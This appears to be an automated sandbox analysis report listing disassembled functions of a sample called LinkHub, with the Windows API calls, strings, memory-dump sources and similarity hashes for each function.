Opcode ID: d1fe0bd430969c8167867409dd1c45d1474fea539d1ec29dfff63410ee25f68d
Instruction ID: bbcded98ca9b9a7a39c16ae71c7000bb7a76d809e09f101f42e5cf0d24497747
Opcode Fuzzy Hash: d1fe0bd430969c8167867409dd1c45d1474fea539d1ec29dfff63410ee25f68d
Instruction Fuzzy Hash: 6841A2312043019FD720DF24D889B6ABBE4EF84714F245A1DF565B7291D770E904CB62

Function 00E64EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E6DCD0,00000000,?,?,?,?), ref: 00E64F48
GetWindowLongW.USER32 ref: 00E64F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E64F75

Strings

SysTreeView32, xrefs: 00E64F1A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 8945f150b9e6c5d84b69ed7ca28183ffd162e177906493850ba6911a9a4448ad
Instruction ID: 32cb96fad31a699aa5a992df1e567bea5f054be1d6bc710658b1a749a1b8b567
Opcode Fuzzy Hash: 8945f150b9e6c5d84b69ed7ca28183ffd162e177906493850ba6911a9a4448ad
Instruction Fuzzy Hash: E531AF71654205AFDB218E38EC45BDB77A9EB083B8F206715F975B21E0C770EC509B60

Function 00E53AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E53DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00E53AD4,?,?), ref: 00E53DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E53AD7
_wcslen.LIBCMT ref: 00E53AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00E53B63

Strings

255.255.255.255, xrefs: 00E53AF2, 00E53AF7

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 752bffa37f5f1a357541d6f245bb271b37fabb2d26ca9655d3282d41fc41ca73
Instruction ID: 41ba63be6fa7956ac6e598745b7c3879dc0f6b8c6c89ea6f4b43f4b574d40f1a
Opcode Fuzzy Hash: 752bffa37f5f1a357541d6f245bb271b37fabb2d26ca9655d3282d41fc41ca73
Instruction Fuzzy Hash: 2F31F5356002019FCB60CF79C485EAAB7F1EF14399F249559EC16AB392C731EE49C760

Function 00E64954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E649DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E649F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00E64A14

Strings

SysMonthCal32, xrefs: 00E649A7

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: f64d2a991fca8b7f714f7310c0f52919d506f3b5831ebaf7d8727bc8bc3fcd41
Instruction ID: 880a749226b2e41109c4525fa5ce1015ee7f2f47444f822aa773e8caf2b1e83d
Opcode Fuzzy Hash: f64d2a991fca8b7f714f7310c0f52919d506f3b5831ebaf7d8727bc8bc3fcd41
Instruction Fuzzy Hash: 7521DD72680219BBDF118E90DC42FEB3BA9EF88768F111214FA057B0D0D6B1E855DBA0

Function 00E650F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E651A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E651B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E651B8

Strings

msctls_updown32, xrefs: 00E65122

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 54daa034a37cfcd1a4486f423c19ee05d53818e5fca6c6a439f28530cd703b10
Instruction ID: 885ee495d76171c4402433a7f4c26ef303183db8d5923c092d714ef4a49986c6
Opcode Fuzzy Hash: 54daa034a37cfcd1a4486f423c19ee05d53818e5fca6c6a439f28530cd703b10
Instruction Fuzzy Hash: 952162B5741609AFDB11DF28DC81DB737ADEB5A3A8F041159FA00A7361CB70EC15CAA0

Function 00E64253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E642DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E642EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E64312

Strings

Listbox, xrefs: 00E642AB

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 08b586522432cf226f1972711fef4028e522187a9c17a5949c9f8c2cbb24f6ab
Instruction ID: dbe51603362d1ca14c9a477db1b80dfa13e039245f12799f4f8dc528398739bb
Opcode Fuzzy Hash: 08b586522432cf226f1972711fef4028e522187a9c17a5949c9f8c2cbb24f6ab
Instruction Fuzzy Hash: 5421B072644218BFEF118F94EC84FAB3B6EEB897A4F119115F900BB1E0C671AC5187A0

Function 00E45439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E4544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E454A1
SetErrorMode.KERNEL32(00000000,?,?,00E6DCD0), ref: 00E45515

Strings

%lu, xrefs: 00E454B4

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: bccd27f16d88de3247398238cdcbbbc6b0017643a280a49ba123e4e95d2c2278
Instruction ID: ef8096e5581ee1e5bce683ce0343a8f3dffaf8fea3377f37982b61703c44d194
Opcode Fuzzy Hash: bccd27f16d88de3247398238cdcbbbc6b0017643a280a49ba123e4e95d2c2278
Instruction Fuzzy Hash: 63312F71A00209AFDB10DF54D885EAA7BF9EF09308F144099E509EB362DB75EE45CB61

Function 00E68305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00E68339
EnumChildWindows.USER32(?,00E6802F,00000000), ref: 00E683B0

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

Strings

(, xrefs: 00E68317
(, xrefs: 00E6834A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: ($(
API String ID: 3814560230-3881858432
Opcode ID: f9d22bf46fc0628495292ce10087ac1efa9410a8c67c037529ef398c65e097fa
Instruction ID: 426b1e979d01c39e434d04ade5f1f993f805f1160685aeaa637e6b2cbac8e92b
Opcode Fuzzy Hash: f9d22bf46fc0628495292ce10087ac1efa9410a8c67c037529ef398c65e097fa
Instruction Fuzzy Hash: 3D211974244205DFC7248F29E950AA6B7F5EB8A7A0F20171DE975B73A0DB70B804CB60

Function 00E64C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E64CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E64D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E64D0F

Strings

msctls_trackbar32, xrefs: 00E64CC4

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 394305287ef750dca0ff79661c75e1be59c0c1c890c33f91e530c3fbdbc74a15
Instruction ID: 20aeaf17cdac4b38dc923357d069f44035d034dad3360450251036586ef42113
Opcode Fuzzy Hash: 394305287ef750dca0ff79661c75e1be59c0c1c890c33f91e530c3fbdbc74a15
Instruction Fuzzy Hash: 2A113AB1280208BEEF105F65DC05FAB77A8EF857A8F111114FA40F21E0C271DC10DB20

Function 00E3389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD8577: _wcslen.LIBCMT ref: 00DD858A

Part of subcall function 00E336F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E33712
Part of subcall function 00E336F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E33723
Part of subcall function 00E336F4: GetCurrentThreadId.KERNEL32 ref: 00E3372A
Part of subcall function 00E336F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E33731

GetFocus.USER32 ref: 00E338C4

Part of subcall function 00E3373B: GetParent.USER32(00000000), ref: 00E33746

GetClassNameW.USER32(?,?,00000100), ref: 00E3390F
EnumChildWindows.USER32(?,00E33987), ref: 00E33937

Strings

%s%d, xrefs: 00E3394B

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: dcd13bbccdbe7f93850bd76da404c0f7ad3cbd897055aa4e29fee6a8bf14de8d
Instruction ID: aff693306a70046473b646b92f74cb8ef1ca9510df347bcc2f1bb9ba864921f8
Opcode Fuzzy Hash: dcd13bbccdbe7f93850bd76da404c0f7ad3cbd897055aa4e29fee6a8bf14de8d
Instruction Fuzzy Hash: 7911D5B5B04205ABCF01BF749C8AEEE7BA99F94344F005065F909BB296CEB19945DB30

Function 00DD59FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00DD5A34
DestroyWindow.USER32(?,00DD37B8,?,?,?,?,?,00DD3709,?,?), ref: 00DD5A91

Strings

<), xrefs: 00E14F34
<), xrefs: 00DD5A09

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: <)$<)
API String ID: 2587070983-10615988
Opcode ID: 3ef96b361cf212cc0fb83a6d7227683ffb77e3c768ddeb1ef144d27e968311c4
Instruction ID: 87a199c08f54f8990368aebc3248e012f4cc1afece4b4b28a26e61aa28880c56
Opcode Fuzzy Hash: 3ef96b361cf212cc0fb83a6d7227683ffb77e3c768ddeb1ef144d27e968311c4
Instruction Fuzzy Hash: BD21FC74606511CFDB189B1EF894B6633E0ABCEB15F05615EE602BB368CB30BC48CB21

Function 00E66321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E66360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E6638D
DrawMenuBar.USER32(?), ref: 00E6639C

Strings

0, xrefs: 00E6632E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 54e4084c7b95c8e60faf075d8bac9be0aa7e49039a793219137df2e0fc36f024
Instruction ID: 32db27cfaacea55b1edae0055a5a8673bf69aa0b3f5060a787522de1cd6a0fa7
Opcode Fuzzy Hash: 54e4084c7b95c8e60faf075d8bac9be0aa7e49039a793219137df2e0fc36f024
Instruction Fuzzy Hash: CC016131654218EFDB119F11EC84BAE7BB4FB44395F10C099E54AE6151DB708985EF31

Function 00E6823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,00EA28E0,00E6AD55,000000FC,?,00000000,00000000,?), ref: 00E6823F
GetFocus.USER32 ref: 00E68247

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

Part of subcall function 00DD2234: GetWindowLongW.USER32(?,000000EB), ref: 00DD2242

SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 00E682B4

Strings

(, xrefs: 00E68254

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: (
API String ID: 3601265619-2063206799
Opcode ID: 4aef5dbd5e059e6edd41e5364b4c4e644377e8116dea9ec477d743568a91f8c7
Instruction ID: 755bb5327cc2a8beb6026aae57a2d127a5d4ff4a02ed24f083e1bdf957418074
Opcode Fuzzy Hash: 4aef5dbd5e059e6edd41e5364b4c4e644377e8116dea9ec477d743568a91f8c7
Instruction Fuzzy Hash: 71015231602500CFC3159B69E854A6A37AAEB8A368F14025DE516B73B0CB316C0BCB50

Function 00E68526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

DestroyAcceleratorTable.USER32(?), ref: 00E68576
CreateAcceleratorTableW.USER32(00000000,?,?,?,00E4BE96,00000000,00000000,?,00000001,00000002), ref: 00E6858C
GetForegroundWindow.USER32(?,00E4BE96,00000000,00000000,?,00000001,00000002), ref: 00E68595

Part of subcall function 00DD249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DD24B0

Strings

(, xrefs: 00E68532

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
String ID: (
API String ID: 986409557-2063206799
Opcode ID: 615ff1c46dbc267e313f86a7053da14a2335235561d274d6ccdbd7635908cf09
Instruction ID: 61ee6240b1438f96a3d6082ed72100b79bf658c9b9865e3bd603c8b130793ae5
Opcode Fuzzy Hash: 615ff1c46dbc267e313f86a7053da14a2335235561d274d6ccdbd7635908cf09
Instruction Fuzzy Hash: E8012D30A05304CFCB249F6AEC84A6677A1FB597A5F10561EF612B66B0DB30A998CB41

Function 00E68BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EA4038,00EA407C), ref: 00E68C1A
CloseHandle.KERNEL32 ref: 00E68C2C

Strings

8@, xrefs: 00E68BD6
|@, xrefs: 00E68BE5

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: 8@$|@
API String ID: 3712363035-2203533388
Opcode ID: b69070087bb1f2ee88386cc19294723dfac9b94cec2750b16d841df584fcc663
Instruction ID: 88e64c5452ac78a49c4ad921f24ba3f2049a337a2519247422200376c5d843fd
Opcode Fuzzy Hash: b69070087bb1f2ee88386cc19294723dfac9b94cec2750b16d841df584fcc663
Instruction Fuzzy Hash: 8BF030F2681204BEE3106B626C86F777A5CEB5A390F414021BB08F51D1D6E56814A2BA

Function 00E3096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ba8693725e3c64ac80370a31212bf0e73e19eb488bbe303c23166c08c79ffd
Instruction ID: bda7206146a02c75b61b608bd7deb191b26e1945d78340db0f10f120ce69dd40
Opcode Fuzzy Hash: 83ba8693725e3c64ac80370a31212bf0e73e19eb488bbe303c23166c08c79ffd
Instruction Fuzzy Hash: 67C15D75A00206EFDB14CF94C8A8EAEBBB5FF48708F209598E505EB251D771EE41CB90

Function 00E041F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00E0427E
__alldvrm.LIBCMT ref: 00E0447F
__alldvrm.LIBCMT ref: 00E044A1

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
Instruction ID: 4d2c66077202de65e3a69498f054deeb4581e9d070e9d8da6aa8d71a4696a36a
Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
Instruction Fuzzy Hash: DCA156F2A003869FDB25DE18C9917AEBBE5EF11314F2451ADE6A5BB2C1C23899C1C750

Function 00E30D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E70BD4,?), ref: 00E30EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E70BD4,?), ref: 00E30EF8
CLSIDFromProgID.OLE32(?,?,00000000,00E6DCE0,000000FF,?,00000000,00000800,00000000,?,00E70BD4,?), ref: 00E30F1D
_memcmp.LIBVCRUNTIME ref: 00E30F3E

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: b4127b2467e89549d9a310df2c1dc36892895dc7711c10dfbcd2e62e0e8ae0fd
Instruction ID: eb864bf59f9a88126fba12ef1814f02b39287c37f6ee0c5d983c21ba025814ff
Opcode Fuzzy Hash: b4127b2467e89549d9a310df2c1dc36892895dc7711c10dfbcd2e62e0e8ae0fd
Instruction Fuzzy Hash: C6811A75A00109EFCB04DF94C998DEEBBB9FF89315F204558E516BB250DB71AE05CB60

